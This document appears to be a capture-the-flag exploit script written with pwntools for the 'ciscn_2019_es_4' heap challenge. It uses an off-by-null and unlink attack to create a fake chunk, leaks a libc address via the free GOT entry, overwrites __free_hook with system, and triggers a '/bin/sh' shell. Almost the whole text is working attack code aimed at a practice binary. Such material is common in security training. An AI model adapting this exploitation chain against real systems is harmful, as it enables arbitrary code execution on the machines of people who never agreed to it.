off-by-null + unlink
from pwn import *
# Process-wide pwntools settings: 64-bit packing for p64/u64 and verbose
# tube logging so every send/recv is visible while the chain is debugged.
context(arch='amd64', log_level='debug')

# Local target by default; the commented remote() line is the alternative
# endpoint and is left untouched so it can be swapped back in.
s = process('./ciscn_2019_es_4')
# s = remote('node4.buuoj.cn', 25370)

# Symbol sources: the matching libc build (for free/system/__free_hook
# offsets) and the challenge binary itself (for the GOT address used later).
elf = ELF('./ciscn_2019_es_4')
libc = ELF('./glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so')
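def add(index, size, content):
    """Menu option 1: request a chunk `index` of `size` bytes and send `content`.

    `index` and `size` are sent as ASCII decimal text, explicitly encoded so
    the whole function speaks bytes only (the original mixed str and bytes
    and relied on pwntools' implicit encoding). `content` is sent raw with
    sendafter(), so the caller decides whether a newline is included.
    """
    s.sendlineafter(b'4.show\n', b'1')
    s.sendlineafter(b'index:\n', str(index).encode())
    s.sendlineafter(b'size:\n', str(size).encode())
    s.sendafter(b'content:\n', content)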
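def delete(index):
    """Menu option 2: free chunk `index`.

    The index is sent as explicitly encoded ASCII decimal so the call does
    not depend on pwntools' implicit str->bytes conversion.
    """
    s.sendlineafter(b'4.show\n', b'2')
    s.sendlineafter(b'index:\n', str(index).encode())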
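def edit(index, content):
    """Menu option 3: overwrite chunk `index` with `content`.

    `content` is sent raw with sendafter() (no newline appended), so the
    caller controls the exact bytes written; the index is sent as
    explicitly encoded ASCII decimal.
    """
    s.sendlineafter(b'4.show\n', b'3')
    s.sendlineafter(b'index:\n', str(index).encode())
    s.sendafter(b'content:\n', content)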
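def show(index):
    """Menu option 4: ask the program to print chunk `index`.

    Nothing is read back here; whatever the program prints stays in the
    tube for the caller to consume. The index is sent as explicitly
    encoded ASCII decimal.
    """
    s.sendlineafter(b'4.show\n', b'4')
    s.sendlineafter(b'index:\n', str(index).encode())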
# Fixed addresses of the non-PIE binary. `target` is the qword 7 entries past
# 0x6020E0 (index 7 below is the chunk whose contents are overwritten), and
# fd/bk are the two pointers derived from it that the fake chunk carries.
target = 0x6020E0 + 7 * 8
fd, bk = target - 0x18, target - 0x10
# Written into chunks 4 and 5 later; its meaning is not visible in this file.
key2_addr = 0x6022B8
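def _add_with_gift(index, size, content):
    """add() variant that also captures the value the program prints after 'gift: '.

    Same menu sequence as add(); the only difference is that the text between
    the size prompt and the content prompt is parsed as a hex number and
    returned. Inputs are encoded explicitly, matching add().
    """
    s.sendlineafter(b'4.show\n', b'1')
    s.sendlineafter(b'index:\n', str(index).encode())
    s.sendlineafter(b'size:\n', str(size).encode())
    s.recvuntil(b'gift: ')
    # NOTE(review): reads exactly 7 hex digits, as the original did — confirm
    # this is the width the binary prints; a different width would leave the
    # tube out of sync with the content prompt.
    gift = int(s.recv(7), 16)
    s.sendafter(b'content:\n', content)
    return gift


# Seven 0xf0-byte chunks (indices 0-6); they are all freed again below.
for i in range(7):
    add(i, 0xf0, b'a')

# Chunk 7 (0x88 bytes) is the one whose allocation prints the gift value.
heap_addr = _add_with_gift(7, 0x88, b'a')
success(f'heap_addr=>{heap_addr:#x}')

add(8, 0xf0, b'a')
add(9, 0x80, b'a')
add(10, 0x80, b'a')
add(11, 0x80, b'/bin/sh\x00')  # chunk 11 holds the '/bin/sh' string

for i in range(7):
    delete(i)

# New contents of chunk 7: fake header (size 0x81) with the fd/bk values
# from above, zero padding, then a single qword 0x80. Total length is 0x88,
# i.e. exactly the allocation size requested for chunk 7.
payload = b''.join([
    p64(0), p64(0x81),
    p64(fd), p64(bk),
    b'\x00' * 0x60,
    p64(0x80),
])
edit(7, payload)
delete(8)

# Second write through chunk 7. The original ended this with the literal
# 0x602100, which is exactly `fd` (target - 0x18); the name is used so the
# relation to the addresses defined above is explicit.
payload = b''.join([
    p64(heap_addr + 0x190), p64(heap_addr + 0x190),
    p64(elf.got['free']), p64(fd),
])
edit(7, payload)

delete(4)
delete(5)
add(4, 0x80, p64(key2_addr))
add(5, 0x80, p64(key2_addr))
add(8, 0x80, p64(0xfffffff))

# show(6) prints whatever entry 6 now references; the leak is corrected by
# free's libc offset, so that entry is expected to resolve to free@got
# (this depends on the table layout assumed by `target` — see the constants).
show(6)
libc_base = u64(s.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - libc.sym['free']
success(f'libc_base=>{libc_base:#x}')

system_addr = libc_base + libc.sym['system']
__free_hook = libc_base + libc.sym['__free_hook']
edit(7, p64(__free_hook))
edit(4, p64(system_addr))
delete(11)
# gdb.attach(s)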
作者:{狒猩橙}